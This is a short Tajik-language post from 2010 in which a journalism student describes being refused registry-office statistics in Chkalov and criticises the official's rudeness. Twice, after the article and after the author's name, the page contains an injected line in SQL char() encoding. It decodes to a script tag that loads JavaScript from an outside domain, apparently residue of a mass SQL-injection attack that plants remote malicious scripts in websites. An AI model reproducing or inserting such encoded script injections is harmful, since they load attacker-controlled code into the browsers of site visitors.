20.07.2010
Гирифтани иттилоъ барои донишҷӯ осон?
Ҳафтаи саввум аст, ки таҷрибаомӯзиамро дар ҳафтавори Суғд гузаронида иситодаам. Барои омода намудани маводи навбатӣ санаи 14 уми июн ба САҲШ-и шаҳри Чкалов рафтам. Баробари ворид шуданам бо китибаи идораи мазкур рӯ ба рӯ шудам. Мақсад доштам доир ба вазъи сабти никоҳ ва вазъи ҷудошавӣ дар 6 моҳи охир маълумот гирам. Пас аз муаррифӣ, хоҳиш намудам, ки маълумоти лозимаро ба ман пешниҳод намоянд. Дар ҷавоб котиба иброз дошт, ки «ҳисобот дар дасти муаллима, он кас ба маҷлис рафтаанд, интизор шавед меоянд». Баъди 2 соати интизорӣ ба бино даромада пурсам гуфт, ки имрӯз намеоянд. Маълум шуд, ки ӯ ба ман маълумот доданӣ ҳам нест. Аз ман ҳуҷҷат талаб намуд. Баъди нишон додани шаҳодатномаи донишҷӯиам гуфт, ки «Донишҷу худаш кист ки ба ту маълумот пешниҳод намоям». Оё чунин муносиба бо дигарон ҷоиз аст. Шояд ин тоифа ба омӯзиши рафтору муносиба бо дигарон ниёз дошта бошад.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)87b39eedece3a2ed8efd956aaa4dc911.js" type="text/javascript">
Қодиров Субҳиддин
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)87b39eedece3a2ed8efd956aaa4dc911.js" type="text/javascript">

